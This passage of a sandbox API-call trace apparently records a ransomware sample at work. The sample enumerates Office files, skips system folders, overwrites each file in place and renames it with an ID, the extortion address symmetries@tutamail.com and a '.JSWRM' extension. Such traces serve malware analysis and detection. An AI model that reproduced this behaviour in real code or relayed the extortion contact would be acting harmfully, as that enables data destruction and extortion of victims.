cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC.HXS", lpUsedDefaultChar=0x0) returned 14 [0114.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0114.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0114.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.374] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=138368) returned 1 [0114.374] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21c80) returned 0x24c1d0 [0114.374] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x21c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x21c80, lpOverlapped=0x0) returned 1 [0114.436] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.436] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x21c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x21c80, lpOverlapped=0x0) returned 1 [0114.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.436] CloseHandle (hObject=0x238) returned 1 [0114.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0114.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0114.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0114.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0114.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0114.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0114.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.437] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0114.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0114.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.439] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_BASIC_COL.HXC", cAlternateFileName="LYNC_B~1.HXC")) returned 1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2=".") returned 1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="..") returned 1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="...") returned 1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="windows") returned -1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="recovery") returned -1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="perflogs") returned -1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="documents and settings") returned 1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="system volume information") returned -1 [0114.439] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXC", lpString2="msocache") returned -1 [0114.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXC", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0114.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXC", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_COL.HXC", lpUsedDefaultChar=0x0) returned 18 [0114.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXC", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXC", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_COL.HXC", lpUsedDefaultChar=0x0) returned 18 [0114.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0114.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0114.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0114.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.441] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=646) returned 1 [0114.441] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0114.441] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0114.442] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.442] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0114.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.442] CloseHandle (hObject=0x238) returned 1 [0114.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0114.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0114.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0114.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0114.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0114.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0114.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0114.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0114.444] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b5d49a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b5d49a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9b8364e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd2, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_BASIC_COL.HXT", cAlternateFileName="LYNC_B~1.HXT")) returned 1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2=".") returned 1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="..") returned 1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="...") returned 1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="windows") returned -1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="recovery") returned -1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="perflogs") returned -1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="documents and settings") returned 1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="system volume information") returned -1 [0114.444] lstrcmpiW (lpString1="LYNC_BASIC_COL.HXT", lpString2="msocache") returned -1 [0114.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXT", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0114.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXT", cchWideChar=18, lpMultiByteStr=0x241060, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_COL.HXT", lpUsedDefaultChar=0x0) returned 18 [0114.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXT", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_COL.HXT", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_COL.HXT", lpUsedDefaultChar=0x0) returned 18 [0114.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0114.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0114.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.446] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=210) returned 1 [0114.446] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0114.446] ReadFile (in: hFile=0x238, lpBuffer=0x22ea18, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0114.447] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.447] WriteFile (in: hFile=0x238, lpBuffer=0x22ea18*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0114.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0114.447] CloseHandle (hObject=0x238) returned 1 [0114.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0114.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0114.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0114.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0114.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0114.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0114.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0114.449] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa2f6cec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa2f6cec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa31ce71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_BASIC_F_COL.HXK", cAlternateFileName="LYNC_B~2.HXK")) returned 1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2=".") returned 1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="..") returned 1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="...") returned 1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="windows") returned -1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="recovery") returned -1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="perflogs") returned -1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="system volume information") returned -1 [0114.449] lstrcmpiW (lpString1="LYNC_BASIC_F_COL.HXK", lpString2="msocache") returned -1 [0114.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_F_COL.HXK", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0114.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_F_COL.HXK", cchWideChar=20, lpMultiByteStr=0x241178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 20 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_F_COL.HXK", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0114.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_F_COL.HXK", cchWideChar=20, lpMultiByteStr=0x2413a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 20 [0114.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.450] 